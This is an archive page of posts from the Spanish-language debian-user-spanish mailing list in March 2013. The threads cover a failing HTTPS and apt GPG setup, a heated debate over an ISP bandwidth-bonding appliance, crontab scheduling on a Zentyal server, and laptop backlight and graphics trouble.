Re: no puedo acceder a paginas con https

2013-03-19 Por tema Felix Perez
El 18/03/13, Francisco Antonio francisc@linuxmail.org escribió:
 El 18/03/13 16:25, Felix Perez escribió:
 2013/3/18, Fabián Bonettimama21mama2...@yahoo.com.ar:
 On Mon, 18 Mar 2013 16:43:33 -0300
 Felix Perezfelix.listadeb...@gmail.com  wrote:



 Comprueba la fecha si la tienes correcta.
 Gracias Fabián, la fecha esta correcta aunque con todo los problemas
 que hemos tenido con el retraso en el cambio de hora (Chile) no
 descarto que algo tenga que ver.
 el date me devuelve:
 lun mar 18 17:20:39 ART 2013

 Saludos.


 Perdón yo soy de chile y no he tenido problema alguno con el cambio de
 hora, para eso están los admin..


Eso mismo dile al santander, al bci, al chile, al sii, a movistar
entel, webpay  y a otros más que no recuerdo en estos momentos.

Saludos.

-- 
usuario linux  #274354
normas de la lista:  http://wiki.debian.org/es/NormasLista
como hacer preguntas inteligentes:
http://www.sindominio.net/ayuda/preguntas-inteligentes.html


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAiZAx7iXyNyrx42Kbf4+PaMXG5pA4sF45vT_=rout401-b...@mail.gmail.com



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Felix Perez
El 19/03/13, Felix Perez felix.listadeb...@gmail.com escribió:
 El 18/03/13, Francisco Antonio francisc@linuxmail.org escribió:
 El 18/03/13 16:25, Felix Perez escribió:
 2013/3/18, Fabián Bonettimama21mama2...@yahoo.com.ar:
 On Mon, 18 Mar 2013 16:43:33 -0300
 Felix Perezfelix.listadeb...@gmail.com  wrote:



 Comprueba la fecha si la tienes correcta.
 Gracias Fabián, la fecha esta correcta aunque con todo los problemas
 que hemos tenido con el retraso en el cambio de hora (Chile) no
 descarto que algo tenga que ver.
 el date me devuelve:
 lun mar 18 17:20:39 ART 2013


Mi sources.list solo tiene estas líneas.

deb http://ftp.us.debian.org/debian/ testing main contrib non-free
deb-src http://ftp.us.debian.org/debian/ testing main contrib non-free

La línea que me intriga es esta:
Des: 1 http://ftp.us.debian.org testing InRelease [224 kB]
Ign http://ftp.us.debian.org testing InRelease

¿Alguien ha tenido problemas con los repositorios en estos días?

Gracias a todos.

-- 
usuario linux  #274354
normas de la lista:  http://wiki.debian.org/es/NormasLista
como hacer preguntas inteligentes:
http://www.sindominio.net/ayuda/preguntas-inteligentes.html


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAiZAx7VKQZYbaK=t3yx-tbvq-suwaujxu7worg3jnn_j-1...@mail.gmail.com



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Gonzalo Rivero
El mar, 19-03-2013 a las 10:02 -0300, Felix Perez escribió: 
 El 19/03/13, Felix Perez felix.listadeb...@gmail.com escribió:
  El 18/03/13, Francisco Antonio francisc@linuxmail.org escribió:
  El 18/03/13 16:25, Felix Perez escribió:
  2013/3/18, Fabián Bonettimama21mama2...@yahoo.com.ar:
  On Mon, 18 Mar 2013 16:43:33 -0300
  Felix Perezfelix.listadeb...@gmail.com  wrote:
 
 
 
  Comprueba la fecha si la tienes correcta.
  Gracias Fabián, la fecha esta correcta aunque con todo los problemas
  que hemos tenido con el retraso en el cambio de hora (Chile) no
  descarto que algo tenga que ver.
  el date me devuelve:
  lun mar 18 17:20:39 ART 2013
 
 
 Mi sources.list solo tiene estas líneas.
 
 deb http://ftp.us.debian.org/debian/ testing main contrib non-free
 deb-src http://ftp.us.debian.org/debian/ testing main contrib non-free
 
 La línea que me intriga es esta:
 Des: 1 http://ftp.us.debian.org testing InRelease [224 kB]
 Ign http://ftp.us.debian.org testing InRelease
 
 ¿Alguien ha tenido problemas con los repositorios en estos días?
 
en este momento estoy intentando descargar, creo que el mirror es
argentino ( cdn.debian.net ) y me salen timeouts, pero culpo a mi
conexión

 Gracias a todos.
 


-- 
(-.(-.(-.(-.(-.(-.-).-).-).-).-).-)



-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/1363702138.2663.16.ca...@eeepc.ucasal.ar



Re: 2 isp [ot]

2013-03-19 Por tema Camaleón
El Mon, 18 Mar 2013 23:30:36 +0100, Ramses escribió:

 El 18/03/2013, a las 21:54, Camaleón noela...@gmail.com escribió:

(...)

 Si esto solo es un tema de conceptos y de interpretaciones... El Ancho
 de Banda total del que dispone una LAN para descargas/moverse por
 Internet, y el Ancho de Banda máximo del que dispone un único PC de
 esa LAN para descargarse un único fichero desde Internet con cualquier
 protocolo, no solo HTTP, sino también FTP o cualquier otro...
 
 No sé... a mí me parece que tiene un mercado bien definido y que puede
 ser de utilidad para algunos usuarios pero obviamente no para todos ni
 para todo.
 
 Pues eso, lo que te comentaba, que a mi no es que me valgan o me dejen
 de valer, sólo es un tema de conceptos y desde el punto de vista desde
 el que se  interpreten...

No sé cómo lo interpretarás pero a mí me parece que está bastante claro 
lo que permite el dispositivo que no es ni más ni menos lo que preguntaba 
el OP unos 150 correos más arriba.

Saludos,

-- 
Camaleón


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/ki9td6$m9s$1...@ger.gmane.org



Re: [OT] ¿Que clientes usan?

2013-03-19 Por tema Camaleón
El Mon, 18 Mar 2013 19:00:34 -0300, Francisco Del Roio escribió:

 Buenas gente.
 
 La razón por la que dejo este mensaje es porque me llegan hilos
 desordenados, respuestas que comienzan otros hilos,
 etc...etc...etc...etc.

Ah, bienvenido a Isla Caótica, un lugar donde la gente manda los mensajes 
con formato html, usa clientes de correo incompatibles con los 
estándares, hace top-posting, de vez en cuando cross-posting y también 
hay secuestros de hilos.

Tenemos de todo un poco :-)
 
 Uso Thunderbird/icedobe y siempre me ha mostrado correctamente los
 hilos, es solo por eso que dejo el mensaje.

Ná, tranquilo, seguramente no es problema tuyo.

¿Tienes algún hilo de ejemplo?

P.S. Yo uso Pan/0.132 (Waxed in Black), un cliente NNTP.

Saludos,

-- 
Camaleón


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/ki9tms$m9s$2...@ger.gmane.org



Re: 2 isp [ot]

2013-03-19 Por tema Ramses
Buenas tardes,

El 19/03/2013, a las 15:40, Camaleón noela...@gmail.com escribió:

 El Mon, 18 Mar 2013 23:30:36 +0100, Ramses escribió:
 
 El 18/03/2013, a las 21:54, Camaleón noela...@gmail.com escribió:
 
 (...)
 
 Si esto solo es un tema de conceptos y de interpretaciones... El Ancho
 de Banda total del que dispone una LAN para descargas/moverse por
 Internet, y el Ancho de Banda máximo del que dispone un único PC de
 esa LAN para descargarse un único fichero desde Internet con cualquier
 protocolo, no solo HTTP, sino también FTP o cualquier otro...
 
 No sé... a mí me parece que tiene un mercado bien definido y que puede
 ser de utilidad para algunos usuarios pero obviamente no para todos ni
 para todo.
 
 Pues eso, lo que te comentaba, que a mi no es que me valgan o me dejen
 de valer, sólo es un tema de conceptos y desde el punto de vista desde
 el que se  interpreten...
 
 No sé cómo lo interpretarás pero a mí me parece que está bastante claro 
 lo que permite el dispositivo que no es ni más ni menos lo que preguntaba 
 el OP unos 150 correos más arriba.

Sí, sí, eso, eso, es tal como tú dices, tal y como lo estás interpretando tú...

Es que como soy nuevo en esto de las comunicaciones, me he liado y se me había 
ido la olla...


Saludos,

Ramsés

--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/843d989f-5cd6-4507-b50b-198717231...@gmail.com



Re: Ayuda Crontab

2013-03-19 Por tema Camaleón
El 2013-03-19 a las 10:10 -0400, acade...@pinarte.cult.cu escribió:

(reenvío a la lista y corrijo el top-posting)

  El Mon, 18 Mar 2013 14:36:31 -0400, academia escribió:
 
  (...)
 
  Quiero lograr que cuando el server inicie a las 8 de la mañana,
  automáticamente también lo haga mi Crontab (facilitando la ejecución
  de
  todas las tareas programadas en el mismo)
 
  Que yo sepa cron es un demonio que se inicia cuando se enciende el
  equipo y mee extrañaría que no lo tuvieras configurado así.
 
  ¿Qué problema tienes exactamente?

 Me explico camaleón. 

Pues te lo agardezco porque no me quedaba claro el problema.

 Mi server lo tengo con Zentyal (conozco que es basado en ubuntu, y a 
 su vez este en Debian) y me disculpan, porque esta lista no perdona 
 preguntas de otras distribuciones. Aclaro, TODAS las estaciones de 
 trabajo si están en Debian 6.

No pasa nada, la pregunta aplica a Debian también, sigamos.
 
 Hago esta pregunta en la lista porque creo que este tema es muy similar
 para ambas distros.

Bien.
 
 Algo que no dije, para programar tareas utilizo un GUI que se llama
 gnome-schedule, es mucho más sencillo que utilizar (crontab -e), aunque
 también conozco algo de este último.

http://gnome-schedule.sourceforge.net/

No conozco esa aplicación, pero a simple vista parece un mero front-end 
para editar las tareas de crontab.

 Ya explicaba en correo anterior que he logrado (Encender-Apagar) el server
 de acuerdo a mis necesidades. Lo que ocurre es que al día siguiente cuando
 llego a mi trabajo el servidor está funcionando y todos los servicios
 corriendo sin problemas; pero, como es lógico al acceder al PC-Server en
 pantalla encontramos nos pide usuario y contraseña.

Hasta aquí normal ¿no?

 El problema:
 
 1- Cuando me logueo, el server apaga a las 5 de la tarde como  está
 programado.
 2- Si NO me logueo, el server NO se apaga, aunque los demás servicios
 siguen ok.

Ah, vale. Caray, pues menos mal que has detallado más el problema 
porque hace falta una mega-bola de cristal (con firmware actualizado) 
para adivinar todo esto :-)

 ¿Cómo lograr que sin loguearme se apague el server?

Pues sólo se me ocurre que eso pase si estás haciendo uso de alguna 
fucnionalidad (a priori no se me ocurre ninguna :-?) que pueda necesitar 
que inicies la sesión para poder ejecutar la tarea pero no sé, suena un 
poco retorcido... mejor que estar adivinado, revisa el log 
( grep -i cron /var/log/syslog /var/log/auth.log) para ver qué error 
te aparece a la hora en la que debería ejecutarse la tarea definida en 
el crontab del usuario.
 
 Esto lo quiero lograr porque por ejemplo si tengo que estar fuera de
 provincia por varios dias, no es necesario que el server este encendido en
 horarios que no hacen falta servicios. De otra manera cuando estoy en el
 trabajo y me logueo, sin problemas.
 
 Quisiera saber cómo lograr que el crontab funcione al igual que los otros
 servicios sin necesidad de loguearme.

Saludos,

-- 
Camaleón 


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20130319150246.gb7...@stt008.linux.site



Re: imposible reducir el brillo de la pantalla

2013-03-19 Por tema Camaleón
El Mon, 18 Mar 2013 23:06:04 +0100, Eduardo Rios escribió:

 El 18/03/13 16:29, Camaleón escribió:
 Está curioso, sí... quizá ese valor esté enlazado de alguna forma con
 otro. Mira a ver si tienes algo en
 /sys/devices/virtual/backlight/... Saludos,
 
 La verdad es que no. En /sys/devices/virtual aparece esto:

(...)

Nada :-?

¿Y qué te devuelve?

ls -la /sys/class/backlight

Según la wiki de Archlinux¹, debería enumerar todas las opciones 
disponibles para controlar el brillo de la pantalla (en mi caso veo un 
dispositivo ACPI y otro Intel)

 No sé, sólo puedo decir que este portatil no es que tenga 2 tarjetas
 gráficas independientes. Es como si por software pudieras seleccionar la
 Intel o la ATI Radeon... No sé si me explico... HP hace referencia a
 ella como gráficos intercambiables... y Windows, por software, usaba
 una u otra (dependiendo de si el portátil estaba conectado a la
 corriente o no)

Sí, es el famoso sistema gráfico híbrido que tan de moda está ahora 
aunque a mí personalmente no me convence lo más mínimo, ni para windows 
ni para linux ni para nada: no me gusta el concepto. 

Un adaptador gráfico bien diseñado debería tener la suficiente 
inteligencia como para poder gestionar los estados de energía 
automáticamente (p. ej., a través de perfiles) sin tener necesidad de 
recurrir a un segundo adaptador gráfico con menor potencia y menor 
consumo cuando se ejecutan tareas que no requieren por ejemplo, activar 
la aceleración 3D.

 No sé explicarte más. De todos modos, aún se me cuelga, pero no tanto
 como con los otros controladores gráficos. Empiezo a sospechar que es
 cosa de gnome-shell... porque cuando se queda colgado, abro una consola
 virtual (Ctrl+F1) y hago un shutdown -r now, y en el proceso de
 reinicio veo errores (fugaces) con gnome-shell...

Gnome-shell suele tener problemas con los drivers gráficos cerrados, 
tanto de ati como de nvidia... ¿no te funciona el libre (radeon)?

¹https://wiki.archlinux.org/index.php/Backlight

Saludos,

-- 
Camaleón


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/ki9vre$m9s$3...@ger.gmane.org



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Felix Perez
El 19/03/13, Gonzalo Rivero fishfromsa...@gmail.com escribió:
 El mar, 19-03-2013 a las 10:02 -0300, Felix Perez escribió:
 El 19/03/13, Felix Perez felix.listadeb...@gmail.com escribió:
  El 18/03/13, Francisco Antonio francisc@linuxmail.org escribió:
  El 18/03/13 16:25, Felix Perez escribió:
  2013/3/18, Fabián Bonettimama21mama2...@yahoo.com.ar:
  On Mon, 18 Mar 2013 16:43:33 -0300
  Felix Perezfelix.listadeb...@gmail.com  wrote:
 
 
 
  Comprueba la fecha si la tienes correcta.
  Gracias Fabián, la fecha esta correcta aunque con todo los problemas
  que hemos tenido con el retraso en el cambio de hora (Chile) no
  descarto que algo tenga que ver.
  el date me devuelve:
  lun mar 18 17:20:39 ART 2013
 

 Mi sources.list solo tiene estas líneas.

 deb http://ftp.us.debian.org/debian/ testing main contrib non-free
 deb-src http://ftp.us.debian.org/debian/ testing main contrib non-free

 La línea que me intriga es esta:
 Des: 1 http://ftp.us.debian.org testing InRelease [224 kB]
 Ign http://ftp.us.debian.org testing InRelease

 ¿Alguien ha tenido problemas con los repositorios en estos días?

 en este momento estoy intentando descargar, creo que el mirror es
 argentino ( cdn.debian.net ) y me salen timeouts, pero culpo a mi
 conexión


Al intentar utilizar epiphany-browser desde consola, y querer acceder
un sitio https me lanza lo siguiente y se cierra:
felix@felix-portatil:~$ epiphany-browser
WARNING: gnome-keyring:: couldn't connect to:
/home/felix/.cache/keyring-aU7YqP/pkcs11: No existe el fichero o el
directorio

** (epiphany-browser:7673): CRITICAL **: load_error_cb: assertion
`(error-domain == WEBKIT_NETWORK_ERROR) || (error-domain ==
WEBKIT_POLICY_ERROR) || (error-domain == WEBKIT_PLUGIN_ERROR)' failed

** (epiphany-browser:7673): CRITICAL **: load_error_cb: assertion
`(error-domain == WEBKIT_NETWORK_ERROR) || (error-domain ==
WEBKIT_POLICY_ERROR) || (error-domain == WEBKIT_PLUGIN_ERROR)' failed
** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/yr/r/7EY04O_1s5h.js @1:
SyntaxError: Invalid character '\u0031'

** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/y1/r/WBF-uhJNDty.js @65:
SyntaxError: Unexpected token ':'

** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/yr/r/7EY04O_1s5h.js @1:
SyntaxError: Invalid character '\u0031'

** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/y1/r/WBF-uhJNDty.js @65:
SyntaxError: Unexpected token ':'

** Message: console message: http://www.facebook.com/ @79:
SyntaxError: Unexpected token ','

** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/yr/r/7EY04O_1s5h.js @1:
SyntaxError: Invalid character '\u0031'

** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/y1/r/WBF-uhJNDty.js @65:
SyntaxError: Unexpected token ':'

** Message: console message: http://www.facebook.com/ @96:
SyntaxError: Expected token ']'

** Message: console message: http://www.facebook.com/ @149:
SyntaxError: Expected an identifier but found 'U' instead

** Message: console message: http://www.facebook.com/ @151:
SyntaxError: At least one digit must occur after a decimal point

** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/yr/r/7EY04O_1s5h.js @1:
SyntaxError: Invalid character '\u0031'

** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/y1/r/WBF-uhJNDty.js @65:
SyntaxError: Unexpected token ':'

** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/yr/r/7EY04O_1s5h.js @1:
SyntaxError: Invalid character '\u0031'

** Message: console message:
http://static.ak.fbcdn.net/rsrc.php/v2/y1/r/WBF-uhJNDty.js @65:
SyntaxError: Unexpected token ':'

Violación de segmento

La verdad estoy completamente desorientado.

Gracias.

-- 
usuario linux  #274354
normas de la lista:  http://wiki.debian.org/es/NormasLista
como hacer preguntas inteligentes:
http://www.sindominio.net/ayuda/preguntas-inteligentes.html


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAiZAx55qHDVODTS3N=weVGau=tewbwnh+wgjbcbdwouwro...@mail.gmail.com



Re: 2 isp [ot]

2013-03-19 Por tema Camaleón
El Tue, 19 Mar 2013 16:07:30 +0100, Ramses escribió:

 El 19/03/2013, a las 15:40, Camaleón noela...@gmail.com escribió:

(...)

 Pues eso, lo que te comentaba, que a mi no es que me valgan o me dejen
 de valer, sólo es un tema de conceptos y desde el punto de vista desde
 el que se  interpreten...
 
 No sé cómo lo interpretarás pero a mí me parece que está bastante claro
 lo que permite el dispositivo que no es ni más ni menos lo que
 preguntaba el OP unos 150 correos más arriba.
 
 Sí, sí, eso, eso, es tal como tú dices, tal y como lo estás
 interpretando tú...

Yo no, es lo que te ha respondido el fabricante, lo que indica en la hoja 
de especificaciones del producto... de hecho es una característica 
diferencial del aparato.

 Es que como soy nuevo en esto de las comunicaciones, me he liado y se me
 había ido la olla...

Pues no sé... será que los de Mushroom Networks también son unos recién 
iniciados en esto de las redes, no saben lo que dicen, no saben lo que 
venden y no saben lo que hacen. Ains...

Saludos,

-- 
Camaleón


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/kia06h$m9s$4...@ger.gmane.org



Re: 2 isp [ot]

2013-03-19 Por tema Ramses
Buenas tardes,

El 19/03/2013, a las 16:28, Camaleón noela...@gmail.com escribió:

 El Tue, 19 Mar 2013 16:07:30 +0100, Ramses escribió:
 
 El 19/03/2013, a las 15:40, Camaleón noela...@gmail.com escribió:
 
 (...)
 
 Pues eso, lo que te comentaba, que a mi no es que me valgan o me dejen
 de valer, sólo es un tema de conceptos y desde el punto de vista desde
 el que se  interpreten...
 
 No sé cómo lo interpretarás pero a mí me parece que está bastante claro
 lo que permite el dispositivo que no es ni más ni menos lo que
 preguntaba el OP unos 150 correos más arriba.
 
 Sí, sí, eso, eso, es tal como tú dices, tal y como lo estás
 interpretando tú...
 
 Yo no, es lo que te ha respondido el fabricante, lo que indica en la hoja 
 de especificaciones del producto... de hecho es una característica 
 diferencial del aparato.
 
 Es que como soy nuevo en esto de las comunicaciones, me he liado y se me
 había ido la olla...
 
 Pues no sé... será que los de Mushroom Networks también son unos recién 
 iniciados en esto de las redes, no saben lo que dicen, no saben lo que 
 venden y no saben lo que hacen. Ains...

Eso será, Camaleón, que cuando dicen que, sin hacer peering,  suman el Ancho 
de Banda SOLO para el protocolo HTTP, y que para el resto hacen Balanceo de 
Carga, pues será lo que tú estás interpretando, que suma el Ancho de Banda de 
los enlaces WAN de distintos operadores que se le conecten al appliance.


Saludos,

Ramsés

--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/cf690768-3b08-4454-84df-2c66361e6...@gmail.com



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Roberto Quiñones

El 19/03/2013 12:23, Felix Perez escribió:

WARNING: gnome-keyring:: couldn't connect to:


A modo de consulta, usas lxde, gnome, kde, cual ¿?.

Saludos


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/51488c4e.7000...@acshell.net



Re: 2 isp [ot]

2013-03-19 Por tema Camaleón
El Tue, 19 Mar 2013 16:48:29 +0100, Ramses escribió:

 Buenas tardes,
 
 El 19/03/2013, a las 16:28, Camaleón noela...@gmail.com escribió:

(...)

 Sí, sí, eso, eso, es tal como tú dices, tal y como lo estás
 interpretando tú...
 
 Yo no, es lo que te ha respondido el fabricante, lo que indica en la
 hoja de especificaciones del producto... de hecho es una característica
 diferencial del aparato.
 
 Es que como soy nuevo en esto de las comunicaciones, me he liado y se
 me había ido la olla...
 
 Pues no sé... será que los de Mushroom Networks también son unos recién
 iniciados en esto de las redes, no saben lo que dicen, no saben lo que
 venden y no saben lo que hacen. Ains...
 
 Eso será, Camaleón, que cuando dicen que, sin hacer peering,  suman el
 Ancho de Banda SOLO para el protocolo HTTP, y que para el resto hacen
 Balanceo de Carga, pues será lo que tú estás interpretando, que suma el
 Ancho de Banda de los enlaces WAN de distintos operadores que se le
 conecten al appliance.

Y eso es exactamente lo que hace el dispositivo: sumar el ancho de banda 
de los dos enlaces que tengas conectados (de distintos ISP o del mismo) 
sin necesidad de colaboración por parte del carrier para duplicar el 
ancho de banda (lo de duplicar lo dicen ellos no yo) y acelerar las 
descargas http... que vuelvo a decir quizá no es lo que tu querías/
imaginabas/pensabas pero sí es lo que preguntaba el OP.

Saludos,

-- 
Camaleón


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/kia3iq$m9s$5...@ger.gmane.org



Re: no puedo acceder a paginas con https

2013-03-19 Por tema Felix Perez
2013/3/19, Roberto Quiñones robe...@acshell.net:
 El 19/03/2013 12:23, Felix Perez escribió:
 WARNING: gnome-keyring:: couldn't connect to:

 A modo de consulta, usas lxde, gnome, kde, cual ¿?.


Uso XCFE, pero lo mismo pasa con gnome clasic, fluxbox u openbox.

Otro dato para poder acceder a gmail debo seleccionar modo html
básico, si no no puedo entrar a la cuenta.

Acabo de reiniciar el equipo y por consola al hacer aptitude update me da:
Des: 1 http://ftp.us.debian.org testing InRelease [224 kB]
Ign http://ftp.us.debian.org testing InRelease
Descargados 224 kB en 1seg. (122 kB/s)
E: Error de GPG: http://ftp.us.debian.org testing InRelease: Las
siguientes firms fueron inválidas: NODATA 4

He revisado los logs, y no encuentro nada extraño.

¿Alguna idea?

Gracias.

-- 
usuario linux  #274354
normas de la lista:  http://wiki.debian.org/es/NormasLista
como hacer preguntas inteligentes:
http://www.sindominio.net/ayuda/preguntas-inteligentes.html


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/caaizax7yjkzaeq8tjowhxvardyuhscbo8+muqfr2qqqz1ih...@mail.gmail.com



RE: 2 isp [ot]

2013-03-19 Por tema Ramses II
Buenas tardes,

-Mensaje original-
De: Camaleón [mailto:noela...@gmail.com] 
Enviado el: martes, 19 de marzo de 2013 17:26
Para: debian-user-spanish@lists.debian.org
Asunto: Re: 2 isp [ot]

El Tue, 19 Mar 2013 16:48:29 +0100, Ramses escribió:

 Buenas tardes,
 
 El 19/03/2013, a las 16:28, Camaleón noela...@gmail.com escribió:

(...)

 Sí, sí, eso, eso, es tal como tú dices, tal y como lo estás 
 interpretando tú...
 
 Yo no, es lo que te ha respondido el fabricante, lo que indica en la 
 hoja de especificaciones del producto... de hecho es una 
 característica diferencial del aparato.
 
 Es que como soy nuevo en esto de las comunicaciones, me he liado y 
 se me había ido la olla...
 
 Pues no sé... será que los de Mushroom Networks también son unos 
 recién iniciados en esto de las redes, no saben lo que dicen, no 
 saben lo que venden y no saben lo que hacen. Ains...
 
 Eso será, Camaleón, que cuando dicen que, sin hacer peering,  suman 
 el Ancho de Banda SOLO para el protocolo HTTP, y que para el resto 
 hacen Balanceo de Carga, pues será lo que tú estás interpretando, que 
 suma el Ancho de Banda de los enlaces WAN de distintos operadores que 
 se le conecten al appliance.

Y eso es exactamente lo que hace el dispositivo: sumar el ancho de banda de los 
dos enlaces que tengas conectados (de distintos ISP o del mismo) sin necesidad 
de colaboración por parte del carrier para duplicar el ancho de banda (lo 
de duplicar lo dicen ellos no yo) y acelerar las descargas http... que vuelvo 
a decir quizá no es lo que tu querías/ imaginabas/pensabas pero sí es lo que 
preguntaba el OP.

No, no, si ya está claro, si aquí lo dice bien claro:


1) Standalone mode: In this mode, our Truffle appliances will bond all http 
downlink traffic. As an example if you were to download a file behind the 
Truffle device which has 4 ADSL lines plugged in with 6Mbps speed each. Your 
download speed would be around 24Mbps even for that single file download. For 
all other traffic, our device will implement the intelligent load-balancing 
where the Truffle device will distribute the different Internet sessions, on 
various WAN links on a session by session basis. Truffle will keep the 
application semantics in tact, by making sure the sessions from certain 
applications are kept on the same WAN line, such as banking sites, where a 
blind load-balancing would break the application.


Que según tú, ellos dicen ahí esto:


Y eso es exactamente lo que hace el dispositivo: sumar el ancho de banda de los 
dos enlaces que tengas conectados (de distintos ISP o del mismo) sin necesidad 
de colaboración por parte del carrier para duplicar el ancho de banda (lo 
de duplicar lo dicen ellos no yo) y acelerar las descargas http...


Si está claro que ahí dice lo que tú has dicho.

Me imagino que también establecerán la sesión por una WAN y le responderán por 
la otra, porque, por esta regla de tres, también pone ahí eso...

Que ellos no ponen en ningún momento que el UNICO tráfico con el que hacen 
bond es con el HTTP, ni que con el resto hacen Load Balancing, no. Ellos 
dicen, que SUMAN el Ancho de Banda en cualquier circunstancia y sin contar con 
el Carrier, ni el operador, ni nadie, que lo suman y punto.

Si está claro, si lo pone en ese párrafo.


Saludos,

Ramsés


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/002101ce24c2$12786ae0$376940a0$@gmail.com



Re: 2 isp [ot]

2013-03-19 Por tema Camaleón
El Tue, 19 Mar 2013 17:51:49 +0100, Ramses II escribió:

Corrijo las citas... a ver si cambias ese Outlook ;-)

(...)

 Eso será, Camaleón, que cuando dicen que, sin hacer peering,  suman
 el Ancho de Banda SOLO para el protocolo HTTP, y que para el resto
 hacen Balanceo de Carga, pues será lo que tú estás interpretando, que
 suma el Ancho de Banda de los enlaces WAN de distintos operadores que
 se le conecten al appliance.
  
 Y eso es exactamente lo que hace el dispositivo: sumar el ancho de 
 banda de los dos enlaces que tengas conectados (de distintos ISP o del
 mismo) sin necesidad de colaboración por parte del carrier para
 duplicar el ancho de banda (lo de duplicar lo dicen ellos no yo) y
 acelerar las descargas http... que vuelvo a decir quizá no es lo que
 tu querías/imaginabas/pensabas pero sí es lo que preguntaba el OP.
 
 No, no, si ya está claro, si aquí lo dice bien claro:
 
 
 1) Standalone mode: In this mode, our Truffle appliances will bond all
 http downlink traffic. As an example if you were to download a file
 behind the Truffle device which has 4 ADSL lines plugged in with 6Mbps
 speed each. Your download speed would be around 24Mbps even for that
 single file download. For all other traffic, our device will implement
 the intelligent load-balancing where the Truffle device will
 distribute the different Internet sessions, on various WAN links on a
 session by session basis. Truffle will keep the application semantics in
 tact, by making sure the sessions from certain applications are kept on
 the same WAN line, such as banking sites, where a blind load-balancing
 would break the application. 
 
 
 Que según tú, ellos dicen ahí esto:
 
 
 Y eso es exactamente lo que hace el dispositivo: sumar el ancho de banda
 de los dos enlaces que tengas conectados (de distintos ISP o del mismo)
 sin necesidad de colaboración por parte del carrier para duplicar el
 ancho de banda (lo de duplicar lo dicen ellos no yo) y acelerar las
 descargas http... 
 
 
 Si está claro que ahí dice lo que tú has dicho.

Pues sí, hijo, más claro agua.

Traducido: A modo de ejemplo, si vas a descargar un archivo que está 
detrás del dispositivo Truffle que tiene conectadas 4 líneas ADSL de 6 
Mbps cada una la velocidad de descarga será de unos 24 Mbps para esa 
descarga de un único archivo.

 Me imagino que también establecerán la sesión por una WAN y le
 responderán por la otra, porque, por esta regla de tres, también pone
 ahí eso...

Si tienes más dudas pregúntales de nuevo y ya que estás, si te dicen el 
precio de los dispositivos, mejor.

 Que ellos no ponen en ningún momento que el UNICO tráfico con el que
 hacen bond es con el HTTP, ni que con el resto hacen Load Balancing,
 no. Ellos dicen, que SUMAN el Ancho de Banda en cualquier circunstancia
 y sin contar con el Carrier, ni el operador, ni nadie, que lo suman y
 punto.
 
 Si está claro, si lo pone en ese párrafo.

Y luego dicen que yo soy cabezota... caray.

Saludos,

-- 
Camaleón


-- 
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/kia6i8$m9s$6...@ger.gmane.org



RE: 2 isp [ot]

2013-03-19 Por tema Ramses II
Buenas tardes,

Qué más quisiera yo, cambiar el Outlook, bueno, no, mejor, me gustaría que lo 
hiciera bien, mejor que cambiar. Ya cambiaría después de que lo hiciera bien si 
veo otro que me simpatice más...

-Mensaje original-
De: Camaleón [mailto:noela...@gmail.com] 
Enviado el: martes, 19 de marzo de 2013 18:17
Para: debian-user-spanish@lists.debian.org
Asunto: Re: 2 isp [ot]

El Tue, 19 Mar 2013 17:51:49 +0100, Ramses II escribió:

Corrijo las citas... a ver si cambias ese Outlook ;-)

(...)

